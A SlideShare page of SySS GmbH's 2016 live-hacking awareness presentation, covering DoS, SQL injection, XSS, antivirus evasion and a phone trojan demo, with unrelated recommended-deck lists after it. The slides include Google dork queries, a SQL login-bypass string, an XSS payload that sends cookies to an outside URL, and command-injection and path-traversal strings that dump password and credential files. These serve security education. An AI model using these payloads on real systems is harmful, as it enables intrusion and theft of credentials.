SlideShare una empresa de Scribd logo

Live Hacking Agenda and Techniques

Positive Hack Days
Positive Hack Days

This document outlines the agenda for a live hacking presentation hosted by SySS GmbH. The presentation will demonstrate various hacking techniques, including DDoS attacks, wireless keyboard attacks, mobile app and web service attacks, SMS spoofing, and attacks against crypto USB sticks. It will provide an overview of the speaker and SySS GmbH, and discuss recent cybersecurity incidents from 2015. The presentation aims to educate attendees on digital threats and the importance of security assessments and regular security testing. Live demonstrations will include antivirus evasion, mobile phone trojans, SQL injection, and cross-site scripting.

Tecnología
1 de 22
Page 1SySS GmbH14/06/16 LIVE HACKING
Page 2SySS GmbH14/06/16 AGENDA 1. DOS attack against an internet web server 2. Deactivating burglar alarm 3. Attacking wireless keyboards 4. Mobile App and Web Service 5. SMS spoofing and identity theft 6. Attacks against crypto usb sticks 7. Smartphone trojan / SIM bug 8. Hardware hacker tools If time 1. USB attacks 2. Evading antivirus 3. SQL Injection
Page 3SySS GmbH14/06/16 ABOUT THE SPEAKER Dipl.-Inform. Sebastian Schreiber Managing Director of SySS GmbH +49 (0)7071 - 40 78 56-0 sebastian.schreiber@syss.de
Page 4SySS GmbH14/06/16 ABOUT SYSS GMBH Founded in 1998 At present: about 80 employees Based in Tübingen, southwest Germany Operating worldwide, focusing on Germany Rapidly growing: new campus providing space for 280 „Pentest Experts“ is under construction Services Penetration Testing & Security Analyses (95%) Incident Response/ Training/ Live Hacking Presentations (5%)
Page 5SySS GmbH14/06/16 SELECTED INCIDENCES 2015 04/2015: „Russian Hackers Read Obama‘s Unclassified Emails“ – nytimes.com 05/2015: „IT Incident Deutscher Bundestag“ – tagesschau.de 07/2015: „Hacker remotely take over a Jeep Cherokee“ – heise.de 07/2015: „Hackers can disable a sniper rifle – or change its target“ – wired.de 07/2015: „Surveillance software: Hacking Team becoming Hacked Team“ – heise.de 08/2015: „Ashley Madison Dating Portal: Hacker stealing 11,2 Mio. passwords“ – golem.de 09/2015: „Cyber crime: Robbing fingerprints of more then five million US government employees” – wired.de 10/2015: „USA: Hacker stealing data about millions of T-Mobile customers “ – Spiegel.de 10/2015: „Online banking: New ways of attacking German mTAN“ – heise.de
Page 6SySS GmbH14/06/16 GOOGLE HACKING Filetype:sql phpmyadmin wp_users inurl:warenkorb inurl:preis
Page 7SySS GmbH14/06/16 LIVE-HACK HOTEL peter/peter http://www.live-hack.de/xss/xss.php Admin / passwort
Page 8SySS GmbH14/06/16 SQL INJECTION IN LOG-IN FORMS SELECT * FROM users WHERE user='peter' AND password='peter‘ peter' OR 1=1# http://www.live-hack.de/xss/xss.php SELECT * FROM users WHERE user='peter' OR 1=1#' AND password='peter’
Page 9SySS GmbH14/06/16 DENIAL OF SERVICE (DOS) http://www.live-hack.de/clock.php Angriff: /home/livehack/thc/run.sh
Page 10SySS GmbH14/06/16 iPHONE/iPAD HACKS
Page 11SySS GmbH14/06/16 ANTIVIRUS EVASION (1/2) How antivirus software works Blacklisting Whitelisting Blacklisting: How it works and its weak points Signature based: Searching for known patterns Unknown
Page 12SySS GmbH14/06/16 ANTIVIRUS EVASION (2/2) Blacklisting: How it works and its weak points Signature-based: Searching for known patterns Unknown malware will not be detected Polymorphic malware has already been used for a long time to outsmart signature- based detection Behavior-based: Software is classified as harmless or harmful according to its behavior In general, rule-based technologies in combination with scoring procedures and fixed thresholds concerning calculated scores (heuristic procedures) Static code analysis: It is only possible to check code directly accessible within an executable file Dynamic code analysis during runtime (sandbox environment): Various limitations given by the sandbox environment (e.g., period of time, specific user actions like mouse clicks etc.)
Page 13SySS GmbH14/06/16 ANTIVIRUS EVASION: LIVE DEMONSTRATION Free-of-charge malware protection for end-users and small business Uses the same technology and scan engine as System Center 2012 Endpoint Protection (formerly Forefront Endpoint Protection) Example for antivirus software: Microsoft Security Essentials Using the following antivirus evasion methods: Polymorphism Encryption + compression Detection of sandbox environments Malware: Meterpreter Shell (windows/meterpreter/reverse_https) of Metasploit Framework Creating an executable file containing known malware using the software “ShCoLo” by SySS GmbH
Page 14SySS GmbH14/06/16 ANTIVIRUS EVASION: TEST RESULTS Product Version Date of virus definition file Operating system(s) of target systems Avira AntiVir Professional 10.2.0.1064 21.05.2013 Windows XP SP 3 (32 Bit) Windows 7 SP 1 (64 Bit) AVG Free 2013.0.2904 20.05.2013 Windows XP SP 3 (32 Bit) Kaspersky Endpoint Protection Workstation 8.1.0.831 21.05.2013 Windows XP SP 3 (32 Bit) McAfee SaaS Endpoint Protection 5400.1158 20.05.2013 Windows 7 SP 1 (64 Bit) Microsoft Security Essentials 4.1.522.0 21.05.2013 Windows XP SP 3 (32 Bit) Sophos Endpoint Security and Control 10.2 21.05.2013 Windows XP SP 3 (32 Bit) Symantec Endpoint Protection 12.1.1101.401 27.05.2013 Windows 7 SP 1 (64 Bit)
Page 15SySS GmbH14/06/16 MOBILE PHONE TROJAN Symbian phone: 0049-177-6397937 SMS forwarding Activate the microphone Reboot Location info
Page 16SySS GmbH14/06/16 FIPS 140-2 CERTIFIED CRYPTO USB STICKS (1/2)
Page 17SySS GmbH14/06/16 FIPS 140-2 CERTIFIED CRYPTO USB STICKS (2/2)
Page 18SySS GmbH14/06/16 ACTIONABLE TAKEAWAYS Be aware of digital attacks 24/7 Try to think like a hacker when applying IT safety measures Perform security assessments like penetration tests Stay alert and retest your IT security on regular basis Remember: The next vulnerability could just be found while attending this session
Page 19SySS GmbH14/06/16 XSS <script>window.open('http://www.syss.de/cookie.html?'+document.cookie)</scr ipt>
Page 20SySS GmbH14/06/16 INJECTIONS, PHP MAGIC QUOTES http://livehack.syss.de/infoboard/index.php?mod=search Search for, e.g., “SySS” Search for !"§$%&/()=?`‘‚ Conclusio: PHP Magic Quotes Search for SySS $(sleep 4) $(grep -r -i password * > /tmp/passwd) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../. ./../tmp/passwd Search for $(cat inc/userdata.inc.php | base64 > /tmp/userdata.txt) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../. ./../tmp/userdata.txt
Page 21SySS GmbH14/06/16 QUIZDUELL Opponent: lhtest2
Page 22SySS GmbH14/06/16 Thank you very much for your attention! SySS – The Pentest Experts Sebastian Schreiber, Managing Director sebastian.schreiber@syss.de

Recomendados

Небезопасность сотовых сетей вчера, сегодня, завтра
Небезопасность сотовых сетей вчера, сегодня, завтраНебезопасность сотовых сетей вчера, сегодня, завтра
Небезопасность сотовых сетей вчера, сегодня, завтраPositive Hack Days
 
Firewall ppt
Firewall pptFirewall ppt
Firewall pptsaloni mittal
 
Network security and System Admin
Network security and System AdminNetwork security and System Admin
Network security and System AdminMD SAHABUDDIN
 
Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense Firewall
Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense FirewallDetect HTTP Brute Force attack using Snort IDS/IPS on PFSense Firewall
Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense FirewallHuda Seyam
 
SECURE YOUR NETWORK FROM THE INSIDE OUT
SECURE YOUR NETWORK FROM THE INSIDE OUTSECURE YOUR NETWORK FROM THE INSIDE OUT
SECURE YOUR NETWORK FROM THE INSIDE OUTLen Moncrieffe
 
Managed Firewall
Managed FirewallManaged Firewall
Managed FirewallCodero
 
FortiGate 1500D Series Delivers High-Performance Next-Generation Firewall
FortiGate 1500D Series Delivers High-Performance Next-Generation FirewallFortiGate 1500D Series Delivers High-Performance Next-Generation Firewall
FortiGate 1500D Series Delivers High-Performance Next-Generation FirewallShilaThak
 
Call for Papers - International Journal of Network Security & Its Application...
Call for Papers - International Journal of Network Security & Its Application...Call for Papers - International Journal of Network Security & Its Application...
Call for Papers - International Journal of Network Security & Its Application...IJNSA Journal
 

Recomendados

Небезопасность сотовых сетей вчера, сегодня, завтра
Небезопасность сотовых сетей вчера, сегодня, завтраНебезопасность сотовых сетей вчера, сегодня, завтра
Небезопасность сотовых сетей вчера, сегодня, завтраPositive Hack Days
 
Firewall ppt
Firewall pptFirewall ppt
Firewall pptsaloni mittal
 
Network security and System Admin
Network security and System AdminNetwork security and System Admin
Network security and System AdminMD SAHABUDDIN
 
Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense Firewall
Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense FirewallDetect HTTP Brute Force attack using Snort IDS/IPS on PFSense Firewall
Detect HTTP Brute Force attack using Snort IDS/IPS on PFSense FirewallHuda Seyam
 
SECURE YOUR NETWORK FROM THE INSIDE OUT
SECURE YOUR NETWORK FROM THE INSIDE OUTSECURE YOUR NETWORK FROM THE INSIDE OUT
SECURE YOUR NETWORK FROM THE INSIDE OUTLen Moncrieffe
 
Managed Firewall
Managed FirewallManaged Firewall
Managed FirewallCodero
 
FortiGate 1500D Series Delivers High-Performance Next-Generation Firewall
FortiGate 1500D Series Delivers High-Performance Next-Generation FirewallFortiGate 1500D Series Delivers High-Performance Next-Generation Firewall
FortiGate 1500D Series Delivers High-Performance Next-Generation FirewallShilaThak
 
Call for Papers - International Journal of Network Security & Its Application...
Call for Papers - International Journal of Network Security & Its Application...Call for Papers - International Journal of Network Security & Its Application...
Call for Papers - International Journal of Network Security & Its Application...IJNSA Journal
 
Firewall girija ppt
Firewall girija pptFirewall girija ppt
Firewall girija pptGirija Sankar Dash
 
LiPari_Assignment8
LiPari_Assignment8LiPari_Assignment8
LiPari_Assignment8Phillip LiPari
 
The Post Covid-19 Cybersecurity World - Where Is It Headed?
The Post Covid-19 Cybersecurity World - Where Is It Headed?The Post Covid-19 Cybersecurity World - Where Is It Headed?
The Post Covid-19 Cybersecurity World - Where Is It Headed?Bangladesh Network Operators Group
 
Sophos Utm Presentation 2016
Sophos Utm Presentation 2016Sophos Utm Presentation 2016
Sophos Utm Presentation 2016InformatikaFortuno
 
4 Steps to Optimal Endpoint Settings
4 Steps to Optimal Endpoint Settings4 Steps to Optimal Endpoint Settings
4 Steps to Optimal Endpoint SettingsSophos
 
Tech 101: Understanding Firewalls
Tech 101: Understanding FirewallsTech 101: Understanding Firewalls
Tech 101: Understanding FirewallsLikan Patra
 
Securing with Sophos - Sophos Day Belux 2014
Securing with Sophos - Sophos Day Belux 2014Securing with Sophos - Sophos Day Belux 2014
Securing with Sophos - Sophos Day Belux 2014Sophos Benelux
 
SS7 Vulnerabilities
SS7 VulnerabilitiesSS7 Vulnerabilities
SS7 VulnerabilitiesPositiveTechnologies
 
XG Firewall
XG FirewallXG Firewall
XG FirewallDeServ - Tecnologia e Servços
 
Network security over ethernet
Network security over ethernetNetwork security over ethernet
Network security over ethernetSyed Ubaid Ali Jafri
 
voice
voicevoice
voicechaitu64
 
Fortinet Tanıtım
Fortinet TanıtımFortinet Tanıtım
Fortinet TanıtımGüney Bilişim
 
Data Security in Local Area Network Using Distributed Firewall
Data Security in Local Area Network Using Distributed FirewallData Security in Local Area Network Using Distributed Firewall
Data Security in Local Area Network Using Distributed FirewallManish Kumar
 
Firewall presentation m. emin özgünsür
Firewall presentation m. emin özgünsürFirewall presentation m. emin özgünsür
Firewall presentation m. emin özgünsüremin_oz
 
160415 lan and-wan-ctap
160415 lan and-wan-ctap160415 lan and-wan-ctap
160415 lan and-wan-ctapLan & Wan Solutions
 
Evento 15 aprile
Evento 15 aprileEvento 15 aprile
Evento 15 aprileLan & Wan Solutions
 
Firewall
FirewallFirewall
FirewallHasnain Ali
 
Watch guard solution
Watch guard solutionWatch guard solution
Watch guard solutionlaonap166
 
Remote Access Security
Remote Access SecurityRemote Access Security
Remote Access Securitysyrinxtech
 
network security, group policy and firewalls
network security, group policy and firewallsnetwork security, group policy and firewalls
network security, group policy and firewallsSapna Kumari
 
introduction to Embedded System Security
introduction to Embedded System Securityintroduction to Embedded System Security
introduction to Embedded System SecurityAdel Barkam
 
Windows xp/7 - What can we do ?
Windows xp/7 - What can we do ?Windows xp/7 - What can we do ?
Windows xp/7 - What can we do ?Antonio Bartolozzi
 

Más contenido relacionado

La actualidad más candente

4 Steps to Optimal Endpoint Settings
4 Steps to Optimal Endpoint Settings4 Steps to Optimal Endpoint Settings
4 Steps to Optimal Endpoint SettingsSophos
 
Tech 101: Understanding Firewalls
Tech 101: Understanding FirewallsTech 101: Understanding Firewalls
Tech 101: Understanding FirewallsLikan Patra
 
Securing with Sophos - Sophos Day Belux 2014
Securing with Sophos - Sophos Day Belux 2014Securing with Sophos - Sophos Day Belux 2014
Securing with Sophos - Sophos Day Belux 2014Sophos Benelux
 
Data Security in Local Area Network Using Distributed Firewall
Data Security in Local Area Network Using Distributed FirewallData Security in Local Area Network Using Distributed Firewall
Data Security in Local Area Network Using Distributed FirewallManish Kumar
 
Firewall presentation m. emin özgünsür
Firewall presentation m. emin özgünsürFirewall presentation m. emin özgünsür
Firewall presentation m. emin özgünsüremin_oz
 
Watch guard solution
Watch guard solutionWatch guard solution
Watch guard solutionlaonap166
 
Remote Access Security
Remote Access SecurityRemote Access Security
Remote Access Securitysyrinxtech
 
network security, group policy and firewalls
network security, group policy and firewallsnetwork security, group policy and firewalls
network security, group policy and firewallsSapna Kumari
 

La actualidad más candente (20)

Firewall girija ppt
Firewall girija pptFirewall girija ppt
Firewall girija ppt
 
LiPari_Assignment8
LiPari_Assignment8LiPari_Assignment8
LiPari_Assignment8
 
The Post Covid-19 Cybersecurity World - Where Is It Headed?
The Post Covid-19 Cybersecurity World - Where Is It Headed?The Post Covid-19 Cybersecurity World - Where Is It Headed?
The Post Covid-19 Cybersecurity World - Where Is It Headed?
 
Sophos Utm Presentation 2016
Sophos Utm Presentation 2016Sophos Utm Presentation 2016
Sophos Utm Presentation 2016
 
4 Steps to Optimal Endpoint Settings
4 Steps to Optimal Endpoint Settings4 Steps to Optimal Endpoint Settings
4 Steps to Optimal Endpoint Settings
 
Tech 101: Understanding Firewalls
Tech 101: Understanding FirewallsTech 101: Understanding Firewalls
Tech 101: Understanding Firewalls
 
Securing with Sophos - Sophos Day Belux 2014
Securing with Sophos - Sophos Day Belux 2014Securing with Sophos - Sophos Day Belux 2014
Securing with Sophos - Sophos Day Belux 2014
 
SS7 Vulnerabilities
SS7 VulnerabilitiesSS7 Vulnerabilities
SS7 Vulnerabilities
 
XG Firewall
XG FirewallXG Firewall
XG Firewall
 
Network security over ethernet
Network security over ethernetNetwork security over ethernet
Network security over ethernet
 
voice
voicevoice
voice
 
Fortinet Tanıtım
Fortinet TanıtımFortinet Tanıtım
Fortinet Tanıtım
 
Data Security in Local Area Network Using Distributed Firewall
Data Security in Local Area Network Using Distributed FirewallData Security in Local Area Network Using Distributed Firewall
Data Security in Local Area Network Using Distributed Firewall
 
Firewall presentation m. emin özgünsür
Firewall presentation m. emin özgünsürFirewall presentation m. emin özgünsür
Firewall presentation m. emin özgünsür
 
160415 lan and-wan-ctap
160415 lan and-wan-ctap160415 lan and-wan-ctap
160415 lan and-wan-ctap
 
Evento 15 aprile
Evento 15 aprileEvento 15 aprile
Evento 15 aprile
 
Firewall
FirewallFirewall
Firewall
 
Watch guard solution
Watch guard solutionWatch guard solution
Watch guard solution
 
Remote Access Security
Remote Access SecurityRemote Access Security
Remote Access Security
 
network security, group policy and firewalls
network security, group policy and firewallsnetwork security, group policy and firewalls
network security, group policy and firewalls
 

Similar a Live Hacking Agenda and Techniques

introduction to Embedded System Security
introduction to Embedded System Securityintroduction to Embedded System Security
introduction to Embedded System SecurityAdel Barkam
 
Windows xp/7 - What can we do ?
Windows xp/7 - What can we do ?Windows xp/7 - What can we do ?
Windows xp/7 - What can we do ?Antonio Bartolozzi
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)Sri Prasanna
 
Moses Supporting And Enforcing Security Profiles On Smartphones
Moses Supporting And Enforcing Security Profiles On SmartphonesMoses Supporting And Enforcing Security Profiles On Smartphones
Moses Supporting And Enforcing Security Profiles On SmartphonesPapitha Velumani
 
The Consumerisation of Corporate IT
The Consumerisation of Corporate ITThe Consumerisation of Corporate IT
The Consumerisation of Corporate ITPeter Wood
 
Mobile security
Mobile securityMobile security
Mobile securityStefaan
 
Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0mobileironmarketing
 
Cisco Security Presentation
Cisco Security PresentationCisco Security Presentation
Cisco Security PresentationSimplex
 
Your Datacenter at risk? – Patching for the Datacenter
Your Datacenter at risk? – Patching for the DatacenterYour Datacenter at risk? – Patching for the Datacenter
Your Datacenter at risk? – Patching for the DatacenterIvanti
 
Astaro Orange Paper Oss Myths Dispelled
Astaro Orange Paper Oss Myths DispelledAstaro Orange Paper Oss Myths Dispelled
Astaro Orange Paper Oss Myths Dispelledlosalamos
 
Enterprise secure identity in the cloud with Single Sign On and Strong Authen...
Enterprise secure identity in the cloud with Single Sign On and Strong Authen...Enterprise secure identity in the cloud with Single Sign On and Strong Authen...
Enterprise secure identity in the cloud with Single Sign On and Strong Authen...GARL
 
SplunkLive! - Splunk for Security
SplunkLive! - Splunk for SecuritySplunkLive! - Splunk for Security
SplunkLive! - Splunk for SecuritySplunk
 
8 threats that even antivirus cannot catch
8 threats that even antivirus cannot catch8 threats that even antivirus cannot catch
8 threats that even antivirus cannot catchiYogi
 
Reducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsReducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsJan Seidl
 
Pwning Windows Mobile applications by Ankit Giri
Pwning Windows Mobile applications by Ankit GiriPwning Windows Mobile applications by Ankit Giri
Pwning Windows Mobile applications by Ankit GiriOWASP Delhi
 
Splunk for Security Breakout Session
Splunk for Security Breakout SessionSplunk for Security Breakout Session
Splunk for Security Breakout SessionSplunk
 

Similar a Live Hacking Agenda and Techniques (20)

introduction to Embedded System Security
introduction to Embedded System Securityintroduction to Embedded System Security
introduction to Embedded System Security
 
Windows xp/7 - What can we do ?
Windows xp/7 - What can we do ?Windows xp/7 - What can we do ?
Windows xp/7 - What can we do ?
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)
 
Moses Supporting And Enforcing Security Profiles On Smartphones
Moses Supporting And Enforcing Security Profiles On SmartphonesMoses Supporting And Enforcing Security Profiles On Smartphones
Moses Supporting And Enforcing Security Profiles On Smartphones
 
The Consumerisation of Corporate IT
The Consumerisation of Corporate ITThe Consumerisation of Corporate IT
The Consumerisation of Corporate IT
 
Windows Vista Security
Windows Vista SecurityWindows Vista Security
Windows Vista Security
 
Mobile security
Mobile securityMobile security
Mobile security
 
Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0
 
Cyber tooth briefing
Cyber tooth briefingCyber tooth briefing
Cyber tooth briefing
 
End-User Security Awareness
End-User Security AwarenessEnd-User Security Awareness
End-User Security Awareness
 
Cisco Security Presentation
Cisco Security PresentationCisco Security Presentation
Cisco Security Presentation
 
Your Datacenter at risk? – Patching for the Datacenter
Your Datacenter at risk? – Patching for the DatacenterYour Datacenter at risk? – Patching for the Datacenter
Your Datacenter at risk? – Patching for the Datacenter
 
Astaro Orange Paper Oss Myths Dispelled
Astaro Orange Paper Oss Myths DispelledAstaro Orange Paper Oss Myths Dispelled
Astaro Orange Paper Oss Myths Dispelled
 
Enterprise secure identity in the cloud with Single Sign On and Strong Authen...
Enterprise secure identity in the cloud with Single Sign On and Strong Authen...Enterprise secure identity in the cloud with Single Sign On and Strong Authen...
Enterprise secure identity in the cloud with Single Sign On and Strong Authen...
 
SplunkLive! - Splunk for Security
SplunkLive! - Splunk for SecuritySplunkLive! - Splunk for Security
SplunkLive! - Splunk for Security
 
SecurePass at OpenBrighton
SecurePass at OpenBrightonSecurePass at OpenBrighton
SecurePass at OpenBrighton
 
8 threats that even antivirus cannot catch
8 threats that even antivirus cannot catch8 threats that even antivirus cannot catch
8 threats that even antivirus cannot catch
 
Reducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsReducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutions
 
Pwning Windows Mobile applications by Ankit Giri
Pwning Windows Mobile applications by Ankit GiriPwning Windows Mobile applications by Ankit Giri
Pwning Windows Mobile applications by Ankit Giri
 
Splunk for Security Breakout Session
Splunk for Security Breakout SessionSplunk for Security Breakout Session
Splunk for Security Breakout Session
 

Más de Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikPositive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQubePositive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityPositive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для ApproofPositive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложенийPositive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложенийPositive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application SecurityPositive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОPositive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке СиPositive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опытPositive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterPositive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиPositive Hack Days
 

Más de Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Último

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Slack Application Development 101 Slides
